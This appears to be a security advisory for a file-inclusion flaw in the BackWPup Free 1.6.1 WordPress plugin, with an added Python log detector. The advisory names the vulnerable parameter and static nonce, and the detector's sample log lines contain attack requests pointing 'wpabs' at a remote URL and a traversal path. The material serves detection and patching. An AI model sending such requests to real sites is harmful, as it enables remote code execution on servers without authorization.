WordPress Plugin BackWPup Free Remote and Local Code Execution (1.6.1)

Description

WordPress Plugin BackWPup Free is prone to a vulnerability which can be exploited to execute local or remote code on the web server. Input passed to the component "wp_xml_export.php" via the "wpabs" variable allows the inclusion and execution of local or remote PHP files, provided a valid "_nonce" value is known. The "_nonce" value relies on a static constant that is not defined in the script, so it defaults to the value "822728c8d9". WordPress Plugin BackWPup Free version 1.6.1 is vulnerable; other versions may also be affected.
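As an added example (not the plugin's code and not part of the original advisory), a small Python detector that flags access-log requests matching the pattern described above: a request to wp_xml_export.php whose wpabs value is a remote URL, a traversal or null-byte path, or (when the site's install path is supplied) anything other than that path, together with the static default nonce. The sample log lines, the plugin directory, and the assumption that wpabs legitimately carries the WordPress install path are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client ident user [time] "METHOD url PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<url>\S+) [^"]*" \d{3}')
# Effective default for "_nonce" reported in the advisory (undefined constant).
STATIC_NONCE = "822728c8d9"
# Constructed sample lines; the plugin directory under wp-content is assumed.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /wp-admin/ HTTP/1.1" 200 5123',
    '203.0.113.7 - - [10/Oct/2011:13:56:01 +0000] "GET /wp-content/plugins/backwpup/'
    'wp_xml_export.php?wpabs=http://203.0.113.9/x&_nonce=822728c8d9 HTTP/1.1" 200 142',
    '203.0.113.8 - - [10/Oct/2011:13:57:12 +0000] "GET /wp-content/plugins/backwpup/'
    'wp_xml_export.php?wpabs=../../../../tmp/&_nonce=822728c8d9 HTTP/1.1" 500 0',
    '198.51.100.2 - - [10/Oct/2011:13:58:40 +0000] "GET /wp-content/plugins/backwpup/'
    'wp_xml_export.php?wpabs=/var/www/html/&_nonce=3f9a1c0b7e HTTP/1.1" 200 88',
]


def analyse_request(url, expected_abspath=None):
    """Reasons a wp_xml_export.php request looks like an inclusion attempt ([] if clean).
    expected_abspath: install path the site itself passes in "wpabs" (assumed legitimate
    use); when given, any other value is flagged too, catching plain absolute paths."""
    parts = urlsplit(url)
    if not parts.path.endswith("wp_xml_export.php"):
        return []
    params = parse_qs(parts.query)  # percent-decodes, so %00 arrives as "\x00"
    reasons = []
    for value in params.get("wpabs", []):
        if "://" in value.lower():
            reasons.append("wpabs points at a remote URL")
        elif ".." in value or "\x00" in value:
            reasons.append("wpabs contains traversal or a null byte")
        elif expected_abspath is not None and value != expected_abspath:
            reasons.append("wpabs differs from the site's install path")
    if STATIC_NONCE in params.get("_nonce", []):
        reasons.append("request carries the static default nonce")
    return reasons


def scan_log(lines, expected_abspath=None):
    """Return (client_ip, url, reasons) for every flagged request in an access log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not combined format: skip rather than guess
        reasons = analyse_request(m.group("url"), expected_abspath)
        if reasons:
            hits.append((m.group("ip"), m.group("url"), reasons))
    return hits
```

Passing the real install path to scan_log tightens the check, since a plain absolute path contains no traversal and would otherwise go unflagged.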

Remediation

Update to the latest version

References